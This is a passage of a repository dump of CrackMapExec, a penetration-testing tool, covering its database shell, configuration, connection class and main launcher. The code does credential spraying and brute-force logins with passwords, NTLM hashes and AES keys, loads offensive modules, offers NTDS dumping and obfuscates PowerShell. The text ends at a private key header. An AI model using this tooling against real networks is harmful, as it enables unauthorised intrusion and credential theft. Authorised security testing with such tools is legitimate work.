sys.exit(1)\n\n self.conn = None\n self.p_loader = ProtocolLoader()\n self.protocols = self.p_loader.get_protocols()\n\n self.workspace = self.config.get(\"CME\", \"workspace\")\n self.do_workspace(self.workspace)\n\n self.db = self.config.get(\"CME\", \"last_used_db\")\n if self.db:\n self.do_proto(self.db)\n\n def write_configfile(self):\n with open(self.config_path, \"w\") as configfile:\n self.config.write(configfile)\n\n def do_proto(self, proto):\n if not proto:\n return\n\n proto_db_path = path_join(WORKSPACE_DIR, self.workspace, f\"{proto}.db\")\n if exists(proto_db_path):\n self.conn = create_db_engine(proto_db_path)\n db_nav_object = self.p_loader.load_protocol(self.protocols[proto][\"nvpath\"])\n db_object = self.p_loader.load_protocol(self.protocols[proto][\"dbpath\"])\n self.config.set(\"CME\", \"last_used_db\", proto)\n self.write_configfile()\n try:\n proto_menu = getattr(db_nav_object, \"navigator\")(self, getattr(db_object, \"database\")(self.conn), proto)\n proto_menu.cmdloop()\n except UserExitedProto:\n pass\n\n @staticmethod\n def help_proto():\n help_string = \"\"\"\n proto [smb|mssql|winrm]\n *unimplemented protocols: ftp, rdp, ldap, ssh\n Changes cmedb to the specified protocol\n \"\"\"\n print_help(help_string)\n\n def do_workspace(self, line):\n line = line.strip()\n if not line:\n subcommand = \"\"\n self.help_workspace()\n else:\n subcommand = line.split()[0]\n\n if subcommand == \"create\":\n new_workspace = line.split()[1].strip()\n print(f\"[*] Creating workspace '{new_workspace}'\")\n self.create_workspace(new_workspace, self.p_loader, self.protocols)\n self.do_workspace(new_workspace)\n elif subcommand == \"list\":\n print(\"[*] Enumerating Workspaces\")\n for workspace in listdir(path_join(WORKSPACE_DIR)):\n if workspace == self.workspace:\n print(\"==> \" + workspace)\n else:\n print(workspace)\n elif exists(path_join(WORKSPACE_DIR, line)):\n self.config.set(\"CME\", \"workspace\", line)\n self.write_configfile()\n self.workspace = line\n self.prompt = f\"cmedb ({line}) > \"\n\n @staticmethod\n def help_workspace():\n help_string = \"\"\"\n workspace [create | workspace list | workspace ]\n \"\"\"\n print_help(help_string)\n\n @staticmethod\n def do_exit(line):\n sys.exit()\n\n @staticmethod\n def help_exit():\n help_string = \"\"\"\n Exits\n \"\"\"\n print_help(help_string)\n\n @staticmethod\n def create_workspace(workspace_name, p_loader, protocols):\n os.mkdir(path_join(WORKSPACE_DIR, workspace_name))\n\n for protocol in protocols.keys():\n protocol_object = p_loader.load_protocol(protocols[protocol][\"dbpath\"])\n proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f\"{protocol}.db\")\n\n if not exists(proto_db_path):\n print(f\"[*] Initializing {protocol.upper()} protocol database\")\n conn = connect(proto_db_path)\n c = conn.cursor()\n\n # try to prevent some weird sqlite I/O errors\n c.execute(\"PRAGMA journal_mode = OFF\")\n c.execute(\"PRAGMA foreign_keys = 1\")\n\n getattr(protocol_object, \"database\").db_schema(c)\n\n # commit the changes and close everything off\n conn.commit()\n conn.close()\n\n\ndef delete_workspace(workspace_name):\n shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))\n\n\ndef initialize_db(logger):\n if not exists(path_join(WS_PATH, \"default\")):\n logger.debug(\"Creating default workspace\")\n os.mkdir(path_join(WS_PATH, \"default\"))\n\n p_loader = ProtocolLoader()\n protocols = p_loader.get_protocols()\n for protocol in protocols.keys():\n protocol_object = p_loader.load_protocol(protocols[protocol][\"dbpath\"])\n proto_db_path = path_join(WS_PATH, \"default\", f\"{protocol}.db\")\n\n if not exists(proto_db_path):\n logger.debug(f\"Initializing {protocol.upper()} protocol database\")\n conn = connect(proto_db_path)\n c = conn.cursor()\n # try to prevent some weird sqlite I/O errors\n c.execute(\"PRAGMA journal_mode = OFF\") # could try setting to PERSIST if DB corruption starts occurring\n c.execute(\"PRAGMA foreign_keys = 1\")\n # set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash\n c.execute(\"PRAGMA busy_timeout = 5000\")\n getattr(protocol_object, \"database\").db_schema(c)\n # commit the changes and close everything off\n conn.commit()\n conn.close()\n\n\ndef main():\n if not exists(CONFIG_PATH):\n print(\"[-] Unable to find config file\")\n sys.exit(1)\n try:\n cmedbnav = CMEDBMenu(CONFIG_PATH)\n cmedbnav.cmdloop()\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "cme/config.py", "content": "# coding=utf-8\nimport os\nfrom os.path import join as path_join\nimport configparser\nfrom cme.paths import CME_PATH, DATA_PATH\nfrom cme.first_run import first_run_setup\nfrom cme.logger import cme_logger\nfrom ast import literal_eval\n\ncme_default_config = configparser.ConfigParser()\ncme_default_config.read(path_join(DATA_PATH, \"cme.conf\"))\n\ncme_config = configparser.ConfigParser()\ncme_config.read(os.path.join(CME_PATH, \"cme.conf\"))\n\nif \"CME\" not in cme_config.sections():\n first_run_setup()\n cme_config.read(os.path.join(CME_PATH, \"cme.conf\"))\n\n# Check if there are any missing options in the config file\nfor section in cme_default_config.sections():\n for option in cme_default_config.options(section):\n if not cme_config.has_option(section, option):\n cme_logger.display(f\"Adding missing option '{option}' in config section '{section}' to cme.conf\")\n cme_config.set(section, option, cme_default_config.get(section, option))\n\n with open(path_join(CME_PATH, \"cme.conf\"), \"w\") as config_file:\n cme_config.write(config_file)\n\n#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!\ncme_workspace = cme_config.get(\"CME\", \"workspace\", fallback=\"default\")\npwned_label = cme_config.get(\"CME\", \"pwn3d_label\", fallback=\"Pwn3d!\")\naudit_mode = cme_config.get(\"CME\", \"audit_mode\", fallback=False)\nreveal_chars_of_pwd = int(cme_config.get(\"CME\", \"reveal_chars_of_pwd\", fallback=0))\nconfig_log = cme_config.getboolean(\"CME\", \"log_mode\", fallback=False)\nignore_opsec = cme_config.getboolean(\"CME\", \"ignore_opsec\", fallback=False)\nhost_info_colors = literal_eval(cme_config.get(\"CME\", \"host_info_colors\", fallback=[\"green\", \"red\", \"yellow\", \"cyan\"]))\n\n\nif len(host_info_colors) != 4:\n cme_logger.error(\"Config option host_info_colors must have 4 values! Using default values.\")\n host_info_colors = cme_default_config.get(\"CME\", \"host_info_colors\")\n\n\n# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import\ndef process_secret(text):\n hidden = text[:reveal_chars_of_pwd]\n return text if not audit_mode else hidden+audit_mode * 8 \n" }, { "path": "cme/connection.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport socket\nfrom socket import AF_INET, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME\nfrom socket import getaddrinfo\nfrom os.path import isfile\nfrom threading import BoundedSemaphore\nfrom functools import wraps\nfrom time import sleep\nfrom ipaddress import ip_address\n\nfrom cme.config import pwned_label\nfrom cme.helpers.logger import highlight\nfrom cme.logger import cme_logger, CMEAdapter\nfrom cme.context import Context\n\nfrom impacket.dcerpc.v5 import transport\n\nsem = BoundedSemaphore(1)\nglobal_failed_logins = 0\nuser_failed_logins = {}\n\n\ndef gethost_addrinfo(hostname):\n try:\n for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):\n af, socktype, proto, canonname, sa = res\n host = canonname if ip_address(sa[0]).is_link_local else sa[0]\n except socket.gaierror:\n for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):\n af, socktype, proto, canonname, sa = res\n host = sa[0] if sa[0] else canonname\n return host\n\ndef requires_admin(func):\n def _decorator(self, *args, **kwargs):\n if self.admin_privs is False:\n return\n return func(self, *args, **kwargs)\n\n return wraps(func)(_decorator)\n\ndef dcom_FirewallChecker(iInterface, timeout):\n stringBindings = iInterface.get_cinstance().get_string_bindings()\n for strBinding in stringBindings:\n if strBinding['wTowerId'] == 7:\n if strBinding['aNetworkAddr'].find('[') >= 0:\n binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')\n bindingPort = '[' + bindingPort\n else:\n binding = strBinding['aNetworkAddr']\n bindingPort = ''\n\n if binding.upper().find(iInterface.get_target().upper()) >= 0:\n stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]\n break\n elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:\n stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)\n if \"stringBinding\" not in locals():\n return True, None\n try:\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n rpctransport.set_connect_timeout(timeout)\n rpctransport.connect()\n rpctransport.disconnect()\n except:\n return False, stringBinding\n else:\n return True, stringBinding\n\nclass connection(object):\n def __init__(self, args, db, host):\n self.domain = None\n self.args = args\n self.db = db\n self.hostname = host\n self.conn = None\n self.admin_privs = False\n self.password = \"\"\n self.username = \"\"\n self.kerberos = True if self.args.kerberos or self.args.use_kcache or self.args.aesKey else False\n self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]\n self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost\n self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache\n self.failed_logins = 0\n self.local_ip = None\n self.logger = cme_logger\n\n try:\n self.host = gethost_addrinfo(self.hostname)\n if self.args.kerberos:\n self.host = self.hostname\n self.logger.info(f\"Socket info: host={self.host}, hostname={self.hostname}, kerberos={ 'True' if self.args.kerberos else 'False' }\")\n except Exception as e:\n self.logger.info(f\"Error resolving hostname {self.hostname}: {e}\")\n return\n\n if args.jitter:\n jitter = args.jitter\n if \"-\" in jitter:\n start, end = jitter.split(\"-\")\n jitter = (int(start), int(end))\n else:\n jitter = (0, int(jitter))\n\n value = random.choice(range(jitter[0], jitter[1]))\n self.logger.debug(f\"Doin' the jitterbug for {value} second(s)\")\n sleep(value)\n\n try:\n self.proto_flow()\n except Exception as e:\n self.logger.exception(f\"Exception while calling proto_flow() on target {self.host}: {e}\")\n\n @staticmethod\n def proto_args(std_parser, module_parser):\n return\n\n def proto_logger(self):\n pass\n\n def enum_host_info(self):\n return\n\n def print_host_info(self):\n return\n\n def create_conn_obj(self):\n return\n\n def check_if_admin(self):\n return\n\n def kerberos_login(\n self,\n domain,\n username,\n password=\"\",\n ntlm_hash=\"\",\n aesKey=\"\",\n kdcHost=\"\",\n useCache=False,\n ):\n return\n\n def plaintext_login(self, domain, username, password):\n return\n\n def hash_login(self, domain, username, ntlm_hash):\n return\n\n def proto_flow(self):\n self.logger.debug(f\"Kicking off proto_flow\")\n self.proto_logger()\n if self.create_conn_obj():\n self.enum_host_info()\n if self.print_host_info():\n # because of null session\n if self.login() or (self.username == \"\" and self.password == \"\"):\n if hasattr(self.args, \"module\") and self.args.module:\n self.call_modules()\n else:\n self.call_cmd_args()\n\n def call_cmd_args(self):\n for k, v in vars(self.args).items():\n if hasattr(self, k) and hasattr(getattr(self, k), \"__call__\"):\n if v is not False and v is not None:\n self.logger.debug(f\"Calling {k}()\")\n r = getattr(self, k)()\n\n def call_modules(self):\n for module in self.module:\n self.logger.debug(f\"Loading module {module.name} - {module}\")\n module_logger = CMEAdapter(\n extra={\n \"module_name\": module.name.upper(),\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n },\n )\n\n self.logger.debug(f\"Loading context for module {module.name} - {module}\")\n context = Context(self.db, module_logger, self.args)\n context.localip = self.local_ip\n\n if hasattr(module, \"on_request\") or hasattr(module, \"has_response\"):\n self.logger.debug(f\"Module {module.name} has on_request or has_response methods\")\n self.server.connection = self\n self.server.context.localip = self.local_ip\n\n if hasattr(module, \"on_login\"):\n self.logger.debug(f\"Module {module.name} has on_login method\")\n module.on_login(context, self)\n\n if self.admin_privs and hasattr(module, \"on_admin_login\"):\n self.logger.debug(f\"Module {module.name} has on_admin_login method\")\n module.on_admin_login(context, self)\n\n if (not hasattr(module, \"on_request\") and not hasattr(module, \"has_response\")) and hasattr(module, \"on_shutdown\"):\n self.logger.debug(f\"Module {module.name} has on_shutdown method\")\n module.on_shutdown(context, self)\n\n def inc_failed_login(self, username):\n global global_failed_logins\n global user_failed_logins\n\n if username not in user_failed_logins.keys():\n user_failed_logins[username] = 0\n\n user_failed_logins[username] += 1\n global_failed_logins += 1\n self.failed_logins += 1\n\n def over_fail_limit(self, username):\n global global_failed_logins\n global user_failed_logins\n\n if global_failed_logins == self.args.gfail_limit:\n return True\n\n if self.failed_logins == self.args.fail_limit:\n return True\n\n if username in user_failed_logins.keys():\n if self.args.ufail_limit == user_failed_logins[username]:\n return True\n\n return False\n\n def query_db_creds(self):\n \"\"\"\n Queries the database for credentials to be used for authentication.\n Valid cred_id values are:\n - a single cred_id\n - a range specified with a dash (ex. 1-5)\n - 'all' to select all credentials\n\n :return: domain[], username[], owned[], secret[], cred_type[]\n \"\"\"\n domain = []\n username = []\n owned = []\n secret = []\n cred_type = []\n creds = [] # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database\n data = [] # Arbitrary data needed for the login, e.g. ssh_key\n\n for cred_id in self.args.cred_id:\n if isinstance(cred_id, str) and cred_id.lower() == 'all':\n creds = self.db.get_credentials()\n else:\n if not self.db.get_credentials(filter_term=int(cred_id)):\n self.logger.error('Invalid database credential ID {}!'.format(cred_id))\n continue\n creds.extend(self.db.get_credentials(filter_term=int(cred_id)))\n\n for cred in creds:\n c_id, domain_single, username_single, secret_single, cred_type_single, pillaged_from = cred\n domain.append(domain_single)\n username.append(username_single)\n owned.append(False) # As these are likely valid we still want to test them if they are specified in the command line\n secret.append(secret_single)\n cred_type.append(cred_type_single)\n\n if len(secret) != len(data): data = [None] * len(secret)\n return domain, username, owned, secret, cred_type, data\n\n def parse_credentials(self):\n \"\"\"\n Parse credentials from the command line or from a file specified.\n Usernames can be specified with a domain (domain\\\\username) or without (username).\n If the file contains domain\\\\username the domain specified will be overwritten by the one in the file.\n\n :return: domain[], username[], owned[], secret[], cred_type[]\n \"\"\"\n domain = []\n username = []\n owned = []\n secret = []\n cred_type = []\n\n # Parse usernames\n for user in self.args.username:\n if isfile(user):\n with open(user, 'r') as user_file:\n for line in user_file:\n if \"\\\\\" in line:\n domain_single, username_single = line.split(\"\\\\\")\n else:\n domain_single = self.args.domain if hasattr(self.args, \"domain\") and self.args.domain else self.domain\n username_single = line\n domain.append(domain_single)\n username.append(username_single.strip())\n owned.append(False)\n else:\n if \"\\\\\" in user:\n domain_single, username_single = user.split(\"\\\\\")\n else:\n domain_single = self.args.domain if hasattr(self.args, \"domain\") and self.args.domain else self.domain\n username_single = user\n domain.append(domain_single)\n username.append(username_single)\n owned.append(False)\n\n # Parse passwords\n for password in self.args.password:\n if isfile(password):\n with open(password, 'r') as password_file:\n for line in password_file:\n secret.append(line.strip())\n cred_type.append('plaintext')\n else:\n secret.append(password)\n cred_type.append('plaintext')\n\n # Parse NTLM-hashes\n if hasattr(self.args, \"hash\") and self.args.hash:\n for ntlm_hash in self.args.hash:\n if isfile(ntlm_hash):\n with open(ntlm_hash, 'r') as ntlm_hash_file:\n for line in ntlm_hash_file:\n secret.append(line.strip())\n cred_type.append('hash')\n else:\n secret.append(ntlm_hash)\n cred_type.append('hash')\n\n # Parse AES keys\n if self.args.aesKey:\n for aesKey in self.args.aesKey:\n if isfile(aesKey):\n with open(aesKey, 'r') as aesKey_file:\n for line in aesKey_file:\n secret.append(line.strip())\n cred_type.append('aesKey')\n else:\n secret.append(aesKey)\n cred_type.append('aesKey')\n\n return domain, username, owned, secret, cred_type, [None] * len(secret)\n\n def try_credentials(self, domain, username, owned, secret, cred_type, data=None):\n \"\"\"\n Try to login using the specified credentials and protocol.\n Possible login methods are:\n - plaintext (/kerberos)\n - NTLM-hash (/kerberos)\n - AES-key\n \"\"\"\n if self.over_fail_limit(username):\n return False\n if self.args.continue_on_success and owned:\n return False\n # Enforcing FQDN for SMB if not using local authentication. Related issues/PRs: #26, #28, #24, #38\n if self.args.protocol == 'smb' and not self.args.local_auth and \".\" not in domain and not self.args.laps and secret != \"\" and not (self.domain.upper() == self.hostname.upper()) :\n self.logger.error(f\"Domain {domain} for user {username.rstrip()} need to be FQDN ex:domain.local, not domain\")\n return False\n\n with sem:\n if cred_type == 'plaintext':\n if self.args.kerberos:\n return self.kerberos_login(domain, username, secret, '', '', self.kdcHost, False)\n elif hasattr(self.args, \"domain\"): # Some protocolls don't use domain for login\n return self.plaintext_login(domain, username, secret)\n elif self.args.protocol == 'ssh':\n return self.plaintext_login(username, secret, data)\n else:\n return self.plaintext_login(username, secret)\n elif cred_type == 'hash':\n if self.args.kerberos:\n return self.kerberos_login(domain, username, '', secret, '', self.kdcHost, False)\n return self.hash_login(domain, username, secret)\n elif cred_type == 'aesKey':\n return self.kerberos_login(domain, username, '', '', secret, self.kdcHost, False)\n\n def login(self):\n \"\"\"\n Try to login using the credentials specified in the command line or in the database.\n\n :return: True if the login was successful and \"--continue-on-success\" was not specified, False otherwise.\n \"\"\"\n # domain[n] always corresponds to username[n] and owned [n]\n domain = []\n username = []\n owned = [] # Determines whether we have found a valid credential for this user. Default: False\n # secret[n] always corresponds to cred_type[n]\n secret = []\n cred_type = []\n data = [] # Arbitrary data needed for the login, e.g. ssh_key\n\n if self.args.cred_id:\n db_domain, db_username, db_owned, db_secret, db_cred_type, db_data = self.query_db_creds()\n domain.extend(db_domain)\n username.extend(db_username)\n owned.extend(db_owned)\n secret.extend(db_secret)\n cred_type.extend(db_cred_type)\n data.extend(db_data)\n\n if self.args.username:\n parsed_domain, parsed_username, parsed_owned, parsed_secret, parsed_cred_type, parsed_data = self.parse_credentials()\n domain.extend(parsed_domain)\n username.extend(parsed_username)\n owned.extend(parsed_owned)\n secret.extend(parsed_secret)\n cred_type.extend(parsed_cred_type)\n data.extend(parsed_data)\n\n if self.args.use_kcache:\n with sem:\n username = self.args.username[0] if len(self.args.username) else \"\"\n password = self.args.password[0] if len(self.args.password) else \"\"\n self.kerberos_login(self.domain, username, password, \"\", \"\", self.kdcHost, True)\n self.logger.info(\"Successfully authenticated using Kerberos cache\")\n return True\n\n if not self.args.no_bruteforce:\n for secr_index, secr in enumerate(secret):\n for user_index, user in enumerate(username):\n if self.try_credentials(domain[user_index], user, owned[user_index], secr, cred_type[secr_index], data[secr_index]):\n owned[user_index] = True\n if not self.args.continue_on_success:\n return True\n else:\n if len(username) != len(secret):\n self.logger.error(\"Number provided of usernames and passwords/hashes do not match!\")\n return False\n for user_index, user in enumerate(username):\n if self.try_credentials(domain[user_index], user, owned[user_index], secret[user_index], cred_type[user_index], data[user_index]) and not self.args.continue_on_success:\n owned[user_index] = True\n if not self.args.continue_on_success:\n return True\n\n def mark_pwned(self):\n return highlight(f\"({pwned_label})\" if self.admin_privs else \"\")\n" }, { "path": "cme/console.py", "content": "from rich.console import Console\n\ncme_console = Console(soft_wrap=True, tab_size=4)\n" }, { "path": "cme/context.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport configparser\nimport os\n\n\nclass Context:\n def __init__(self, db, logger, args):\n for key, value in vars(args).items():\n setattr(self, key, value)\n\n self.db = db\n self.log_folder_path = os.path.join(os.path.expanduser(\"~/.cme\"), \"logs\")\n self.localip = None\n\n self.conf = configparser.ConfigParser()\n self.conf.read(os.path.expanduser(\"~/.cme/cme.conf\"))\n\n self.log = logger\n # self.log.debug = logging.debug\n" }, { "path": "cme/crackmapexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom cme.helpers.logger import highlight\nfrom cme.helpers.misc import identify_target_file\nfrom cme.parsers.ip import parse_targets\nfrom cme.parsers.nmap import parse_nmap_xml\nfrom cme.parsers.nessus import parse_nessus_file\nfrom cme.cli import gen_cli_args\nfrom cme.loaders.protocolloader import ProtocolLoader\nfrom cme.loaders.moduleloader import ModuleLoader\nfrom cme.servers.http import CMEServer\nfrom cme.first_run import first_run_setup\nfrom cme.context import Context\nfrom cme.paths import CME_PATH, DATA_PATH\nfrom cme.console import cme_console\nfrom cme.logger import cme_logger\nfrom cme.config import cme_config, cme_workspace, config_log, ignore_opsec\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport asyncio\nimport cme.helpers.powershell as powershell\nimport shutil\nimport webbrowser\nimport random\nimport os\nfrom os.path import exists\nfrom os.path import join as path_join\nfrom sys import exit\nimport logging\nimport sqlalchemy\nfrom rich.progress import Progress\nfrom sys import platform\n\n# Increase file_limit to prevent error \"Too many open files\"\nif platform != \"win32\":\n import resource\n file_limit = list(resource.getrlimit(resource.RLIMIT_NOFILE))\n if file_limit[1] > 10000:\n file_limit[0] = 10000\n else:\n file_limit[0] = file_limit[1]\n file_limit = tuple(file_limit)\n resource.setrlimit(resource.RLIMIT_NOFILE, file_limit)\n\ntry:\n import librlers\nexcept:\n print(\"Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)\")\n exit(1)\n\ndef create_db_engine(db_path):\n db_engine = sqlalchemy.create_engine(f\"sqlite:///{db_path}\", isolation_level=\"AUTOCOMMIT\", future=True)\n return db_engine\n\n\nasync def start_run(protocol_obj, args, db, targets):\n cme_logger.debug(f\"Creating ThreadPoolExecutor\")\n if args.no_progress or len(targets) == 1:\n with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:\n cme_logger.debug(f\"Creating thread for {protocol_obj}\")\n _ = [executor.submit(protocol_obj, args, db, target) for target in targets]\n else:\n with Progress(console=cme_console) as progress:\n with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:\n current = 0\n total = len(targets)\n tasks = progress.add_task(\n f\"[green]Running CME against {total} {'target' if total == 1 else 'targets'}\",\n total=total,\n )\n cme_logger.debug(f\"Creating thread for {protocol_obj}\")\n futures = [executor.submit(protocol_obj, args, db, target) for target in targets]\n for _ in as_completed(futures):\n current += 1\n progress.update(tasks, completed=current)\n\n\ndef main():\n first_run_setup(cme_logger)\n root_logger = logging.getLogger(\"root\")\n args = gen_cli_args()\n\n if args.verbose:\n cme_logger.logger.setLevel(logging.INFO)\n root_logger.setLevel(logging.INFO)\n elif args.debug:\n cme_logger.logger.setLevel(logging.DEBUG)\n root_logger.setLevel(logging.DEBUG)\n else:\n cme_logger.logger.setLevel(logging.ERROR)\n root_logger.setLevel(logging.ERROR)\n\n # if these are the same, it might double log to file (two FileHandlers will be added)\n # but this should never happen by accident\n if config_log:\n cme_logger.add_file_log()\n if hasattr(args, \"log\") and args.log:\n cme_logger.add_file_log(args.log)\n\n cme_logger.debug(f\"Passed args: {args}\")\n\n # FROM HERE ON A PROTOCOL IS REQUIRED\n if not args.protocol:\n exit(1)\n\n if args.protocol == \"ssh\":\n if args.key_file:\n if not args.password:\n cme_logger.fail(f\"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`\")\n exit(1)\n\n if args.use_kcache and not os.environ.get(\"KRB5CCNAME\"):\n cme_logger.error(\"KRB5CCNAME environment variable is not set\")\n exit(1)\n\n module_server = None\n targets = []\n server_port_dict = {\"http\": 80, \"https\": 443, \"smb\": 445}\n\n if hasattr(args, \"cred_id\") and args.cred_id:\n for cred_id in args.cred_id:\n if \"-\" in str(cred_id):\n start_id, end_id = cred_id.split(\"-\")\n try:\n for n in range(int(start_id), int(end_id) + 1):\n args.cred_id.append(n)\n args.cred_id.remove(cred_id)\n except Exception as e:\n cme_logger.error(f\"Error parsing database credential id: {e}\")\n exit(1)\n\n if hasattr(args, \"target\") and args.target:\n for target in args.target:\n if exists(target) and os.path.isfile(target):\n target_file_type = identify_target_file(target)\n if target_file_type == \"nmap\":\n targets.extend(parse_nmap_xml(target, args.protocol))\n elif target_file_type == \"nessus\":\n targets.extend(parse_nessus_file(target, args.protocol))\n else:\n with open(target, \"r\") as target_file:\n for target_entry in target_file:\n targets.extend(parse_targets(target_entry.strip()))\n else:\n targets.extend(parse_targets(target))\n\n # The following is a quick hack for the powershell obfuscation functionality, I know this is yucky\n if hasattr(args, \"clear_obfscripts\") and args.clear_obfscripts:\n shutil.rmtree(os.path.expanduser(\"~/.cme/obfuscated_scripts/\"))\n os.mkdir(os.path.expanduser(\"~/.cme/obfuscated_scripts/\"))\n cme_logger.success(\"Cleared cached obfuscated PowerShell scripts\")\n\n if hasattr(args, \"obfs\") and args.obfs:\n powershell.obfuscate_ps_scripts = True\n\n cme_logger.debug(f\"Protocol: {args.protocol}\")\n p_loader = ProtocolLoader()\n protocol_path = p_loader.get_protocols()[args.protocol][\"path\"]\n cme_logger.debug(f\"Protocol Path: {protocol_path}\")\n protocol_db_path = p_loader.get_protocols()[args.protocol][\"dbpath\"]\n cme_logger.debug(f\"Protocol DB Path: {protocol_db_path}\")\n\n protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)\n cme_logger.debug(f\"Protocol Object: {protocol_object}\")\n protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), \"database\")\n cme_logger.debug(f\"Protocol DB Object: {protocol_db_object}\")\n\n db_path = path_join(CME_PATH, \"workspaces\", cme_workspace, f\"{args.protocol}.db\")\n cme_logger.debug(f\"DB Path: {db_path}\")\n\n db_engine = create_db_engine(db_path)\n\n db = protocol_db_object(db_engine)\n\n # with the new cme/config.py this can be eventually removed, as it can be imported anywhere\n setattr(protocol_object, \"config\", cme_config)\n\n if args.module or args.list_modules:\n loader = ModuleLoader(args, db, cme_logger)\n modules = loader.list_modules()\n\n if args.list_modules:\n for name, props in sorted(modules.items()):\n if args.protocol in props[\"supported_protocols\"]:\n cme_logger.display(f\"{name:<25} {props['description']}\")\n exit(0)\n elif args.module and args.show_module_options:\n for module in args.module:\n cme_logger.display(f\"{module} module options:\\n{modules[module]['options']}\")\n exit(0)\n elif args.module:\n cme_logger.debug(f\"Modules to be Loaded: {args.module}, {type(args.module)}\")\n for m in map(str.lower, args.module):\n if m not in modules:\n cme_logger.error(f\"Module not found: {m}\")\n exit(1)\n\n cme_logger.debug(f\"Loading module {m} at path {modules[m]['path']}\")\n module = loader.init_module(modules[m][\"path\"])\n\n if not module.opsec_safe:\n if ignore_opsec:\n cme_logger.debug(f\"ignore_opsec is set in the configuration, skipping prompt\")\n cme_logger.display(f\"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded\")\n else:\n ans = input(\n highlight(\n \"[!] Module is not opsec safe, are you sure you want to run this? [Y/n] For global configuration, change ignore_opsec value to True on ~/cme/cme.conf\",\n \"red\",\n )\n )\n if ans.lower() not in [\"y\", \"yes\", \"\"]:\n exit(1)\n\n if not module.multiple_hosts and len(targets) > 1:\n ans = input(\n highlight(\n \"[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] \",\n \"red\",\n )\n )\n if ans.lower() not in [\"y\", \"yes\", \"\"]:\n exit(1)\n\n if hasattr(module, \"on_request\") or hasattr(module, \"has_response\"):\n if hasattr(module, \"required_server\"):\n args.server = module.required_server\n\n if not args.server_port:\n args.server_port = server_port_dict[args.server]\n\n # loading a module server multiple times will obviously fail\n try:\n context = Context(db, cme_logger, args)\n module_server = CMEServer(\n module,\n context,\n cme_logger,\n args.server_host,\n args.server_port,\n args.server,\n )\n module_server.start()\n protocol_object.server = module_server.server\n except Exception as e:\n cme_logger.error(f\"Error loading module server for {module}: {e}\")\n\n cme_logger.debug(f\"proto_object: {protocol_object}, type: {type(protocol_object)}\")\n cme_logger.debug(f\"proto object dir: {dir(protocol_object)}\")\n # get currently set modules, otherwise default to empty list\n current_modules = getattr(protocol_object, \"module\", [])\n current_modules.append(module)\n setattr(protocol_object, \"module\", current_modules)\n cme_logger.debug(f\"proto object module after adding: {protocol_object.module}\")\n\n if hasattr(args, \"ntds\") and args.ntds and not args.userntds:\n ans = input(\n highlight(\n \"[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user to dump a specific user safely or the module -M ntdsutil [Y/n] \",\n \"red\",\n )\n )\n if ans.lower() not in [\"y\", \"yes\", \"\"]:\n exit(1)\n\n try:\n asyncio.run(start_run(protocol_object, args, db, targets))\n except KeyboardInterrupt:\n cme_logger.debug(\"Got keyboard interrupt\")\n finally:\n if module_server:\n module_server.shutdown()\n db_engine.dispose()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "cme/data/cme.conf", "content": "[CME]\nworkspace = default\nlast_used_db = smb\npwn3d_label = Pwn3d!\naudit_mode = \nreveal_chars_of_pwd = 0\nlog_mode = False\nignore_opsec = True\nhost_info_colors = [\"green\", \"red\", \"yellow\", \"cyan\"]\n\n[BloodHound]\nbh_enabled = False\nbh_uri = 127.0.0.1\nbh_port = 7687\nbh_user = neo4j\nbh_pass = neo4j\n\n[Empire]\napi_host = 127.0.0.1\napi_port = 1337\nusername = empireadmin\npassword = password123\n\n[Metasploit]\nrpc_host = 127.0.0.1\nrpc_port = 55552\npassword = abc123\n\n" }, { "path": "cme/data/default.pem", "content": "-----BEGIN PRIVATE 